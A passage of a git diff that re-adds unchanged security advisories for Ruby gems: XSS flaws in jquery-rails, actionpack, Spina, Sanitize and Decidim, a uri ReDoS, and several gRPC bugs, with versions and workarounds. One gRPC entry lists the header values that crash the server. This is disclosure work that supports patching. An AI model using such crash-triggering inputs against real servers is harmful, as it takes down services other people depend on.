+    - https://github.com/doorkeeper-gem/doorkeeper/pull/1646
+    - https://github.com/doorkeeper-gem/doorkeeper/issues/1589
+    - https://www.rfc-editor.org/rfc/rfc8252#section-8.6
+    - https://github.com/advisories/GHSA-7w2c-w47h-789w
+---
diff --git a/advisories/_posts/2023-06-26-CVE-2020-23064.md b/advisories/_posts/2023-06-26-CVE-2020-23064.md
index 914dd976..3713b67e 100644
--- a/advisories/_posts/2023-06-26-CVE-2020-23064.md
+++ b/advisories/_posts/2023-06-26-CVE-2020-23064.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2020-23064 (jquery-rails): jQuery Cross Site Scripting vulnerability'
-comments: false
-categories:
-- jquery-rails
-- rails
-advisory:
-  gem: jquery-rails
-  framework: rails
-  cve: 2020-23064
-  ghsa: 257q-pv89-v3xv
-  url: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
-  title: jQuery Cross Site Scripting vulnerability
-  date: 2023-06-26
-  description: |
-    Cross Site Scripting vulnerability in jQuery v.2.2.0 until v.3.5.0
-    allows a remote attacker to execute arbitrary code via the
-    `<options>` element.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 4.1.0"
-  patched_versions:
-  - ">= 4.4.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-23064
-    - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
-    - https://github.com/rails/jquery-rails/blob/v4.4.0/vendor/assets/javascripts/jquery3.js#L6162
-    - https://github.com/rails/jquery-rails/blob/v4.3.5/vendor/assets/javascripts/jquery3.js#L5979
-    - https://snyk.io/vuln/SNYK-JS-JQUERY-565129
-    - https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77
-    - https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#410
-    - https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#440
-    - https://github.com/advisories/GHSA-257q-pv89-v3xv
----
+---
+layout: advisory
+title: 'CVE-2020-23064 (jquery-rails): jQuery Cross Site Scripting vulnerability'
+comments: false
+categories:
+- jquery-rails
+- rails
+advisory:
+  gem: jquery-rails
+  framework: rails
+  cve: 2020-23064
+  ghsa: 257q-pv89-v3xv
+  url: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
+  title: jQuery Cross Site Scripting vulnerability
+  date: 2023-06-26
+  description: |
+    Cross Site Scripting vulnerability in jQuery v.2.2.0 until v.3.5.0
+    allows a remote attacker to execute arbitrary code via the
+    `<options>` element.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 4.1.0"
+  patched_versions:
+  - ">= 4.4.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-23064
+    - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
+    - https://github.com/rails/jquery-rails/blob/v4.4.0/vendor/assets/javascripts/jquery3.js#L6162
+    - https://github.com/rails/jquery-rails/blob/v4.3.5/vendor/assets/javascripts/jquery3.js#L5979
+    - https://snyk.io/vuln/SNYK-JS-JQUERY-565129
+    - https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77
+    - https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#410
+    - https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#440
+    - https://github.com/advisories/GHSA-257q-pv89-v3xv
+---
diff --git a/advisories/_posts/2023-06-26-CVE-2023-28362.md b/advisories/_posts/2023-06-26-CVE-2023-28362.md
index e1d0b098..07ecc691 100644
--- a/advisories/_posts/2023-06-26-CVE-2023-28362.md
+++ b/advisories/_posts/2023-06-26-CVE-2023-28362.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2023-28362 (actionpack): Possible XSS via User Supplied Values to redirect_to'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2023-28362
-  ghsa: 4g8v-vg43-wpgf
-  url: https://discuss.rubyonrails.org/t/cve-2023-28362-possible-xss-via-user-supplied-values-to-redirect-to/83132
-  title: Possible XSS via User Supplied Values to redirect_to
-  date: 2023-06-26
-  description: |
-    The redirect_to method in Rails allows provided values to contain characters
-    which are not legal in an HTTP header value. This results in the potential for
-    downstream services which enforce RFC compliance on HTTP response headers to
-    remove the assigned Location header. This vulnerability has been assigned the
-    CVE identifier CVE-2023-28362.
-
-    Versions Affected: All. Not affected: None Fixed Versions: 7.0.5.1, 6.1.7.4
-
-    # Impact
-
-    This introduces the potential for a Cross-site-scripting (XSS) payload to be
-    delivered on the now static redirection page. Note that this both requires
-    user interaction and for a Rails app to be configured to allow redirects to
-    external hosts (defaults to false in Rails >= 7.0.x).
-
-    # Releases
-
-    The FIXED releases are available at the normal locations.
-
-    # Workarounds
-
-    Avoid providing user supplied URLs with arbitrary schemes to the redirect_to
-    method.
-  cvss_v3: 4.0
-  patched_versions:
-  - "~> 6.1.7.4"
-  - ">= 7.0.5.1"
----
+---
+layout: advisory
+title: 'CVE-2023-28362 (actionpack): Possible XSS via User Supplied Values to redirect_to'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2023-28362
+  ghsa: 4g8v-vg43-wpgf
+  url: https://discuss.rubyonrails.org/t/cve-2023-28362-possible-xss-via-user-supplied-values-to-redirect-to/83132
+  title: Possible XSS via User Supplied Values to redirect_to
+  date: 2023-06-26
+  description: |
+    The redirect_to method in Rails allows provided values to contain characters
+    which are not legal in an HTTP header value. This results in the potential for
+    downstream services which enforce RFC compliance on HTTP response headers to
+    remove the assigned Location header. This vulnerability has been assigned the
+    CVE identifier CVE-2023-28362.
+
+    Versions Affected: All. Not affected: None Fixed Versions: 7.0.5.1, 6.1.7.4
+
+    # Impact
+
+    This introduces the potential for a Cross-site-scripting (XSS) payload to be
+    delivered on the now static redirection page. Note that this both requires
+    user interaction and for a Rails app to be configured to allow redirects to
+    external hosts (defaults to false in Rails >= 7.0.x).
+
+    # Releases
+
+    The FIXED releases are available at the normal locations.
+
+    # Workarounds
+
+    Avoid providing user supplied URLs with arbitrary schemes to the redirect_to
+    method.
+  cvss_v3: 4.0
+  patched_versions:
+  - "~> 6.1.7.4"
+  - ">= 7.0.5.1"
+---
diff --git a/advisories/_posts/2023-06-28-CVE-2023-3445.md b/advisories/_posts/2023-06-28-CVE-2023-3445.md
index 85674b68..9c568181 100644
--- a/advisories/_posts/2023-06-28-CVE-2023-3445.md
+++ b/advisories/_posts/2023-06-28-CVE-2023-3445.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2023-3445 (spina): Spina Cross-site Scripting vulnerability'
-comments: false
-categories:
-- spina
-advisory:
-  gem: spina
-  cve: 2023-3445
-  ghsa: 97wh-6hmj-g8j9
-  url: https://huntr.dev/bounties/18a74a9d-4a2d-4bf8-ae62-56a909427070
-  title: Spina Cross-site Scripting vulnerability
-  date: 2023-06-28
-  description: |
-    Cross-site Scripting (XSS) - Stored in GitHub
-    repository spinacms/spina prior to 2.15.1.
-  cvss_v3: 3.5
-  patched_versions:
-  - ">= 2.15.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-3445
-    - https://huntr.dev/bounties/18a74a9d-4a2d-4bf8-ae62-56a909427070
-    - https://github.com/spinacms/spina/commit/9adfe7b4807b3cc10dbb7351a26cc32f5d8c14a3
-    - https://github.com/advisories/GHSA-97wh-6hmj-g8j9
----
+---
+layout: advisory
+title: 'CVE-2023-3445 (spina): Spina Cross-site Scripting vulnerability'
+comments: false
+categories:
+- spina
+advisory:
+  gem: spina
+  cve: 2023-3445
+  ghsa: 97wh-6hmj-g8j9
+  url: https://huntr.dev/bounties/18a74a9d-4a2d-4bf8-ae62-56a909427070
+  title: Spina Cross-site Scripting vulnerability
+  date: 2023-06-28
+  description: |
+    Cross-site Scripting (XSS) - Stored in GitHub
+    repository spinacms/spina prior to 2.15.1.
+  cvss_v3: 3.5
+  patched_versions:
+  - ">= 2.15.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-3445
+    - https://huntr.dev/bounties/18a74a9d-4a2d-4bf8-ae62-56a909427070
+    - https://github.com/spinacms/spina/commit/9adfe7b4807b3cc10dbb7351a26cc32f5d8c14a3
+    - https://github.com/advisories/GHSA-97wh-6hmj-g8j9
+---
diff --git a/advisories/_posts/2023-06-29-CVE-2023-36617.md b/advisories/_posts/2023-06-29-CVE-2023-36617.md
index 3e3d75f3..fbf3c025 100644
--- a/advisories/_posts/2023-06-29-CVE-2023-36617.md
+++ b/advisories/_posts/2023-06-29-CVE-2023-36617.md
@@ -1,61 +1,61 @@
----
-layout: advisory
-title: 'CVE-2023-36617 (uri): ReDoS vulnerability in URI'
-comments: false
-categories:
-- uri
-advisory:
-  gem: uri
-  cve: 2023-36617
-  ghsa: hww2-5g85-429m
-  url: https://www.ruby-lang.org/en/news/2023/06/29/redos-in-uri-CVE-2023-36617
-  title: ReDoS vulnerability in URI
-  date: 2023-06-29
-  description: |
-    We have released the uri gem version 0.12.2, 0.10.3 that has a
-    security fix for a ReDoS vulnerability. This vulnerability has
-    been assigned the CVE identifier CVE-2023-36617.
-
-    Details
-
-    A ReDoS issue was discovered in the URI component through 0.12.1
-    for Ruby. The URI parser mishandles invalid URLs that have specific
-    characters. There is an increase in execution time for parsing
-    strings to URI objects with rfc2396_parser.rb and rfc3986_parser.rb.
-
-    NOTE: this issue exists becuse of an incomplete fix for CVE-2023-28755.
-
-    The uri gem version 0.12.1 and all versions prior 0.12.1 are
-    vulnerable for this vulnerability.
-
-    Recommended action
-
-    We recommend to update the uri gem to 0.12.2.
-    In order to ensure compatibility with bundled version in older
-    Ruby series, you may update as follows instead:
-
-    * For Ruby 3.0: Update to uri 0.10.3
-    * For Ruby 3.1 and 3.2: Update to uri 0.12.2
-      You can use gem update uri to update it. If you are using bundler,
-      please add gem "uri", ">= 0.12.2" (or other version mentioned
-      above) to your Gemfile.
-
-    * Affected versions: uri gem 0.12.1 or before
-  cvss_v3: 5.3
-  patched_versions:
-  - "~> 0.10.0.3"
-  - "~> 0.10.3"
-  - "~> 0.11.2"
-  - ">= 0.12.2"
-  related:
-    cve:
-    - 2023-28755
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-36617
-    - https://www.ruby-lang.org/en/news/2023/06/29/redos-in-uri-CVE-2023-36617
-    - https://rubygems.org/gems/uri/versions/0.12.2
-    - https://rubygems.org/gems/uri/versions/0.11.2
-    - https://rubygems.org/gems/uri/versions/0.10.3
-    - https://rubygems.org/gems/uri/versions/0.10.0.3
-    - https://github.com/advisories/GHSA-hww2-5g85-429m
----
+---
+layout: advisory
+title: 'CVE-2023-36617 (uri): ReDoS vulnerability in URI'
+comments: false
+categories:
+- uri
+advisory:
+  gem: uri
+  cve: 2023-36617
+  ghsa: hww2-5g85-429m
+  url: https://www.ruby-lang.org/en/news/2023/06/29/redos-in-uri-CVE-2023-36617
+  title: ReDoS vulnerability in URI
+  date: 2023-06-29
+  description: |
+    We have released the uri gem version 0.12.2, 0.10.3 that has a
+    security fix for a ReDoS vulnerability. This vulnerability has
+    been assigned the CVE identifier CVE-2023-36617.
+
+    Details
+
+    A ReDoS issue was discovered in the URI component through 0.12.1
+    for Ruby. The URI parser mishandles invalid URLs that have specific
+    characters. There is an increase in execution time for parsing
+    strings to URI objects with rfc2396_parser.rb and rfc3986_parser.rb.
+
+    NOTE: this issue exists becuse of an incomplete fix for CVE-2023-28755.
+
+    The uri gem version 0.12.1 and all versions prior 0.12.1 are
+    vulnerable for this vulnerability.
+
+    Recommended action
+
+    We recommend to update the uri gem to 0.12.2.
+    In order to ensure compatibility with bundled version in older
+    Ruby series, you may update as follows instead:
+
+    * For Ruby 3.0: Update to uri 0.10.3
+    * For Ruby 3.1 and 3.2: Update to uri 0.12.2
+      You can use gem update uri to update it. If you are using bundler,
+      please add gem "uri", ">= 0.12.2" (or other version mentioned
+      above) to your Gemfile.
+
+    * Affected versions: uri gem 0.12.1 or before
+  cvss_v3: 5.3
+  patched_versions:
+  - "~> 0.10.0.3"
+  - "~> 0.10.3"
+  - "~> 0.11.2"
+  - ">= 0.12.2"
+  related:
+    cve:
+    - 2023-28755
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-36617
+    - https://www.ruby-lang.org/en/news/2023/06/29/redos-in-uri-CVE-2023-36617
+    - https://rubygems.org/gems/uri/versions/0.12.2
+    - https://rubygems.org/gems/uri/versions/0.11.2
+    - https://rubygems.org/gems/uri/versions/0.10.3
+    - https://rubygems.org/gems/uri/versions/0.10.0.3
+    - https://github.com/advisories/GHSA-hww2-5g85-429m
+---
diff --git a/advisories/_posts/2023-07-05-CVE-2023-32731.md b/advisories/_posts/2023-07-05-CVE-2023-32731.md
index a6e5a4c9..c9ba3a4b 100644
--- a/advisories/_posts/2023-07-05-CVE-2023-32731.md
+++ b/advisories/_posts/2023-07-05-CVE-2023-32731.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2023-32731 (grpc): Connection confusion in gRPC'
-comments: false
-categories:
-- grpc
-advisory:
-  gem: grpc
-  cve: 2023-32731
-  ghsa: cfgp-2977-2fmm
-  url: https://github.com/grpc/grpc/issues/33463
-  title: Connection confusion in gRPC
-  date: 2023-07-05
-  description: |
-    When gRPC HTTP2 stack raised a header size exceeded error, it
-    skipped parsing the rest of the HPACK frame. This caused any HPACK
-    table mutations to also be skipped, resulting in a desynchronization
-    of HPACK tables between sender and receiver. If leveraged, say,
-    between a proxy and a backend, this could lead to requests from the
-    proxy being interpreted as containing headers from different
-    proxy clients
-    - leading to an information leak that can be used for privilege
-      escalation or data exfiltration. We recommend upgrading beyond
-      the commit contained in  https://github.com/grpc/grpc/pull/32309
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.53.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-32731
-    - https://github.com/grpc/grpc/releases/tag/v1.53.1
-    - https://github.com/grpc/grpc/issues/33463
-    - https://github.com/grpc/grpc/pull/33005
-    - https://github.com/grpc/grpc/pull/32309
-    - https://github.com/advisories/GHSA-cfgp-2977-2fmm
----
+---
+layout: advisory
+title: 'CVE-2023-32731 (grpc): Connection confusion in gRPC'
+comments: false
+categories:
+- grpc
+advisory:
+  gem: grpc
+  cve: 2023-32731
+  ghsa: cfgp-2977-2fmm
+  url: https://github.com/grpc/grpc/issues/33463
+  title: Connection confusion in gRPC
+  date: 2023-07-05
+  description: |
+    When gRPC HTTP2 stack raised a header size exceeded error, it
+    skipped parsing the rest of the HPACK frame. This caused any HPACK
+    table mutations to also be skipped, resulting in a desynchronization
+    of HPACK tables between sender and receiver. If leveraged, say,
+    between a proxy and a backend, this could lead to requests from the
+    proxy being interpreted as containing headers from different
+    proxy clients
+    - leading to an information leak that can be used for privilege
+      escalation or data exfiltration. We recommend upgrading beyond
+      the commit contained in  https://github.com/grpc/grpc/pull/32309
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.53.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-32731
+    - https://github.com/grpc/grpc/releases/tag/v1.53.1
+    - https://github.com/grpc/grpc/issues/33463
+    - https://github.com/grpc/grpc/pull/33005
+    - https://github.com/grpc/grpc/pull/32309
+    - https://github.com/advisories/GHSA-cfgp-2977-2fmm
+---
diff --git a/advisories/_posts/2023-07-06-CVE-2023-1428.md b/advisories/_posts/2023-07-06-CVE-2023-1428.md
index 07041e50..cb4cf4e3 100644
--- a/advisories/_posts/2023-07-06-CVE-2023-1428.md
+++ b/advisories/_posts/2023-07-06-CVE-2023-1428.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2023-1428 (grpc): gRPC Reachable Assertion issue'
-comments: false
-categories:
-- grpc
-advisory:
-  gem: grpc
-  cve: 2023-1428
-  ghsa: 6628-q6j9-w8vg
-  url: https://github.com/grpc/grpc/issues/33463
-  title: gRPC Reachable Assertion issue
-  date: 2023-07-06
-  description: |
-    There exists an vulnerability causing an abort() to be called in gRPC.
-    The following headers cause gRPC's C++ implementation to abort()
-    when called via http2:
-
-    te: x (x != trailers)
-
-    :scheme: x (x != http, https)
-
-    grpclb_client_stats: x (x == anything)
-
-    On top of sending one of those headers, a later header must be sent
-    that gets the total header size past 8KB. We recommend upgrading
-    past git commit 2485fa94bd8a723e5c977d55a3ce10b301b437f8 or v1.53
-    and above.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.53.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-1428
-    - https://github.com/grpc/grpc/issues/33463
-    - https://github.com/grpc/grpc/pull/32507
-    - https://github.com/grpc/grpc/commit/2485fa94bd8a723e5c977d55a3ce10b301b437f8
-    - https://github.com/advisories/GHSA-6628-q6j9-w8vg
----
+---
+layout: advisory
+title: 'CVE-2023-1428 (grpc): gRPC Reachable Assertion issue'
+comments: false
+categories:
+- grpc
+advisory:
+  gem: grpc
+  cve: 2023-1428
+  ghsa: 6628-q6j9-w8vg
+  url: https://github.com/grpc/grpc/issues/33463
+  title: gRPC Reachable Assertion issue
+  date: 2023-07-06
+  description: |
+    There exists an vulnerability causing an abort() to be called in gRPC.
+    The following headers cause gRPC's C++ implementation to abort()
+    when called via http2:
+
+    te: x (x != trailers)
+
+    :scheme: x (x != http, https)
+
+    grpclb_client_stats: x (x == anything)
+
+    On top of sending one of those headers, a later header must be sent
+    that gets the total header size past 8KB. We recommend upgrading
+    past git commit 2485fa94bd8a723e5c977d55a3ce10b301b437f8 or v1.53
+    and above.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.53.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-1428
+    - https://github.com/grpc/grpc/issues/33463
+    - https://github.com/grpc/grpc/pull/32507
+    - https://github.com/grpc/grpc/commit/2485fa94bd8a723e5c977d55a3ce10b301b437f8
+    - https://github.com/advisories/GHSA-6628-q6j9-w8vg
+---
diff --git a/advisories/_posts/2023-07-06-CVE-2023-32732.md b/advisories/_posts/2023-07-06-CVE-2023-32732.md
index 38538cde..c0555cf5 100644
--- a/advisories/_posts/2023-07-06-CVE-2023-32732.md
+++ b/advisories/_posts/2023-07-06-CVE-2023-32732.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2023-32732 (grpc): gRPC connection termination issue'
-comments: false
-categories:
-- grpc
-advisory:
-  gem: grpc
-  cve: 2023-32732
-  ghsa: 9hxf-ppjv-w6rq
-  url: https://github.com/grpc/grpc/releases/tag/v1.53.1
-  title: gRPC connection termination issue
-  date: 2023-07-06
-  description: |
-    gRPC contains a vulnerability whereby a client can cause a
-    termination of connection between a HTTP2 proxy and a gRPC server:
-    a base64 encoding error for `-bin` suffixed headers will result in
-    a disconnection by the gRPC server, but is typically allowed by
-    HTTP2 proxies. We recommend upgrading beyond the commit in
-    https://github.com/grpc/grpc/pull/32309.
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 1.53.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-32732
-    - https://github.com/grpc/grpc/pull/32309
-    - https://github.com/advisories/GHSA-9hxf-ppjv-w6rq
----
+---
+layout: advisory
+title: 'CVE-2023-32732 (grpc): gRPC connection termination issue'
+comments: false
+categories:
+- grpc
+advisory:
+  gem: grpc
+  cve: 2023-32732
+  ghsa: 9hxf-ppjv-w6rq
+  url: https://github.com/grpc/grpc/releases/tag/v1.53.1
+  title: gRPC connection termination issue
+  date: 2023-07-06
+  description: |
+    gRPC contains a vulnerability whereby a client can cause a
+    termination of connection between a HTTP2 proxy and a gRPC server:
+    a base64 encoding error for `-bin` suffixed headers will result in
+    a disconnection by the gRPC server, but is typically allowed by
+    HTTP2 proxies. We recommend upgrading beyond the commit in
+    https://github.com/grpc/grpc/pull/32309.
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 1.53.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-32732
+    - https://github.com/grpc/grpc/pull/32309
+    - https://github.com/advisories/GHSA-9hxf-ppjv-w6rq
+---
diff --git a/advisories/_posts/2023-07-06-CVE-2023-36823.md b/advisories/_posts/2023-07-06-CVE-2023-36823.md
index 010dc485..efcb1663 100644
--- a/advisories/_posts/2023-07-06-CVE-2023-36823.md
+++ b/advisories/_posts/2023-07-06-CVE-2023-36823.md
@@ -1,55 +1,55 @@
----
-layout: advisory
-title: 'CVE-2023-36823 (sanitize): Sanitize vulnerable to Cross-site Scripting via
-  insufficient neutralization  of `style` element content'
-comments: false
-categories:
-- sanitize
-advisory:
-  gem: sanitize
-  cve: 2023-36823
-  ghsa: f5ww-cq3m-q3g7
-  url: https://github.com/rgrove/sanitize/releases/tag/v6.0.2
-  title: Sanitize vulnerable to Cross-site Scripting via insufficient neutralization  of
-    `style` element content
-  date: 2023-07-06
-  description: |
-    ### Impact
-
-    Using carefully crafted input, an attacker may be able to sneak
-    arbitrary HTML and CSS through Sanitize `>= 3.0.0, < 6.0.2` when
-    Sanitize is configured to use the built-in "relaxed" config or
-    when using a custom config that allows `style` elements and one
-    or more CSS at-rules. This could result in XSS (cross-site scripting)
-    or other undesired behavior when the malicious HTML and CSS are
-    rendered in a browser.
-
-    ### Patches
-
-    Sanitize `>= 6.0.2` performs additional escaping of CSS in `style`
-    element content, which fixes this issue.
-
-    ### Workarounds
-
-    Users who are unable to upgrade can prevent this issue by using a
-    Sanitize config that doesn't allow `style` elements, using a Sanitize
-    config that doesn't allow CSS at-rules, or by manually escaping the
-    character sequence `</` as `<\/` in `style` element content.
-
-    ### Credit
-
-    This issue was found by @cure53 during an audit of a project that
-    uses Sanitize and was reported by one of that project's maintainers.
-    Thank you!
-  cvss_v3: 7.1
-  unaffected_versions:
-  - "< 3.0.0"
-  patched_versions:
-  - ">= 6.0.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-36823
-    - https://github.com/rgrove/sanitize/releases/tag/v6.0.2
-    - https://github.com/rgrove/sanitize/commit/76ed46e6dc70820f38efe27de8dabd54dddb5220
-    - https://github.com/advisories/GHSA-f5ww-cq3m-q3g7
----
+---
+layout: advisory
+title: 'CVE-2023-36823 (sanitize): Sanitize vulnerable to Cross-site Scripting via
+  insufficient neutralization  of `style` element content'
+comments: false
+categories:
+- sanitize
+advisory:
+  gem: sanitize
+  cve: 2023-36823
+  ghsa: f5ww-cq3m-q3g7
+  url: https://github.com/rgrove/sanitize/releases/tag/v6.0.2
+  title: Sanitize vulnerable to Cross-site Scripting via insufficient neutralization  of
+    `style` element content
+  date: 2023-07-06
+  description: |
+    ### Impact
+
+    Using carefully crafted input, an attacker may be able to sneak
+    arbitrary HTML and CSS through Sanitize `>= 3.0.0, < 6.0.2` when
+    Sanitize is configured to use the built-in "relaxed" config or
+    when using a custom config that allows `style` elements and one
+    or more CSS at-rules. This could result in XSS (cross-site scripting)
+    or other undesired behavior when the malicious HTML and CSS are
+    rendered in a browser.
+
+    ### Patches
+
+    Sanitize `>= 6.0.2` performs additional escaping of CSS in `style`
+    element content, which fixes this issue.
+
+    ### Workarounds
+
+    Users who are unable to upgrade can prevent this issue by using a
+    Sanitize config that doesn't allow `style` elements, using a Sanitize
+    config that doesn't allow CSS at-rules, or by manually escaping the
+    character sequence `</` as `<\/` in `style` element content.
+
+    ### Credit
+
+    This issue was found by @cure53 during an audit of a project that
+    uses Sanitize and was reported by one of that project's maintainers.
+    Thank you!
+  cvss_v3: 7.1
+  unaffected_versions:
+  - "< 3.0.0"
+  patched_versions:
+  - ">= 6.0.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-36823
+    - https://github.com/rgrove/sanitize/releases/tag/v6.0.2
+    - https://github.com/rgrove/sanitize/commit/76ed46e6dc70820f38efe27de8dabd54dddb5220
+    - https://github.com/advisories/GHSA-f5ww-cq3m-q3g7
+---
diff --git a/advisories/_posts/2023-07-11-CVE-2023-32693.md b/advisories/_posts/2023-07-11-CVE-2023-32693.md
index 738fd366..3882084e 100644
--- a/advisories/_posts/2023-07-11-CVE-2023-32693.md
+++ b/advisories/_posts/2023-07-11-CVE-2023-32693.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2023-32693 (decidim): Decidim Cross-site Scripting vulnerability in the
-  external link redirections'
-comments: false
-categories:
-- decidim
-advisory:
-  gem: decidim
-  cve: 2023-32693
-  ghsa: 469h-mqg8-535r
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-469h-mqg8-535r
-  title: Decidim Cross-site Scripting vulnerability in the external link redirections
-  date: 2023-07-11
-  description: |
-    ### Impact
-
-    The external link feature is susceptible to Cross-site scripting. This allows a remote attacker to execute JavaScript code in the context of a currently logged-in user. An attacker could use this vulnerability to make other users endorse or support proposals they have no intention of supporting or endorsing.
-
-    ### Patches
-
-    The problem was patched in [v0.27.3](https://github.com/decidim/decidim/releases/tag/v0.27.3) and [v0.26.6](https://github.com/decidim/decidim/releases/tag/v0.26.6)
-  cvss_v3: 8.1
-  unaffected_versions:
-  - "< 0.25.0"
-  patched_versions:
-  - "~> 0.26.6"
-  - ">= 0.27.3"
-  related:
-    url:
-    - https://github.com/decidim/decidim/security/advisories/GHSA-469h-mqg8-535r
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-32693
-    - https://github.com/decidim/decidim/releases/tag/v0.26.6
-    - https://github.com/decidim/decidim/releases/tag/v0.27.3
-    - https://github.com/advisories/GHSA-469h-mqg8-535r
----
+---
+layout: advisory
+title: 'CVE-2023-32693 (decidim): Decidim Cross-site Scripting vulnerability in the
+  external link redirections'
+comments: false
+categories:
+- decidim
+advisory:
+  gem: decidim
+  cve: 2023-32693
+  ghsa: 469h-mqg8-535r
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-469h-mqg8-535r
+  title: Decidim Cross-site Scripting vulnerability in the external link redirections
+  date: 2023-07-11
+  description: |
+    ### Impact
+
+    The external link feature is susceptible to Cross-site scripting. This allows a remote attacker to execute JavaScript code in the context of a currently logged-in user. An attacker could use this vulnerability to make other users endorse or support proposals they have no intention of supporting or endorsing.
+
+    ### Patches
+
+    The problem was patched in [v0.27.3](https://github.com/decidim/decidim/releases/tag/v0.27.3) and [v0.26.6](https://github.com/decidim/decidim/releases/tag/v0.26.6)
+  cvss_v3: 8.1
+  unaffected_versions:
+  - "< 0.25.0"
+  patched_versions:
+  - "~> 0.26.6"
+  - ">= 0.27.3"
+  related:
+    url:
+    - https://github.com/decidim/decidim/security/advisories/GHSA-469h-mqg8-535r
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-32693
+    - https://github.com/decidim/decidim/releases/tag/v0.26.6
+    - https://github.com/decidim/decidim/releases/tag/v0.27.3
+    - https://github.com/advisories/GHSA-469h-mqg8-535r
+---
diff --git a/advisories/_posts/2023-07-11-CVE-2023-34089.md b/advisories/_posts/2023-07-11-CVE-2023-34089.md
index eed1388d..298c1843 100644
--- a/advisories/_posts/2023-07-11-CVE-2023-34089.md
+++ b/advisories/_posts/2023-07-11-CVE-2023-34089.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2023-34089 (decidim): Decidim Cross-site Scripting vulnerability in the
-  processes filter'
-comments: false
-categories:
-- decidim
-advisory:
-  gem: decidim
-  cve: 2023-34089
-  ghsa: 5652-92r9-3fx9
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-5652-92r9-3fx9
-  title: Decidim Cross-site Scripting vulnerability in the processes filter
-  date: 2023-07-11
-  description: |
-    ### Impact
-
-    The processes filter feature is susceptible to Cross-site scripting. This allows a remote attacker to execute JavaScript code in the context of a currently logged-in user. An attacker could use this vulnerability to make other users endorse or support proposals they have no intention of supporting or endorsing.
-
-    ### Patches
-
-    The problem was patched in [v0.27.3](https://github.com/decidim/decidim/releases/tag/v0.27.3) and [v0.26.6](https://github.com/decidim/decidim/releases/tag/v0.26.6)
-  cvss_v3: 8.1
-  unaffected_versions:
-  - "< 0.14.0"
-  patched_versions:
-  - "~> 0.26.6"
-  - ">= 0.27.3"
-  related:
-    url:
-    - https://github.com/decidim/decidim/security/advisories/GHSA-5652-92r9-3fx9
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-34089
-    - https://github.com/decidim/decidim/releases/tag/v0.26.6
-    - https://github.com/decidim/decidim/releases/tag/v0.27.3
-    - https://github.com/advisories/GHSA-5652-92r9-3fx9
----
+---
+layout: advisory
+title: 'CVE-2023-34089 (decidim): Decidim Cross-site Scripting vulnerability in the
+  processes filter'
+comments: false
+categories:
+- decidim
+advisory:
+  gem: decidim
+  cve: 2023-34089
+  ghsa: 5652-92r9-3fx9
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-5652-92r9-3fx9
+  title: Decidim Cross-site Scripting vulnerability in the processes filter
+  date: 2023-07-11
+  description: |
+    ### Impact
+
+    The processes filter feature is susceptible to Cross-site scripting. This allows a remote attacker to execute JavaScript code in the context of a currently logged-in user. An attacker could use this vulnerability to make other users endorse or support proposals they have no intention of supporting or endorsing.
+
+    ### Patches
+
+    The problem was patched in [v0.27.3](https://github.com/decidim/decidim/releases/tag/v0.27.3) and [v0.26.6](https://github.com/decidim/decidim/releases/tag/v0.26.6)
+  cvss_v3: 8.1
+  unaffected_versions:
+  - "< 0.14.0"
+  patched_versions:
+  - "~> 0.26.6"
+  - ">= 0.27.3"
+  related:
+    url:
+    - https://github.com/decidim/decidim/security/advisories/GHSA-5652-92r9-3fx9
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-34089
+    - https://github.com/decidim/decidim/releases/tag/v0.26.6
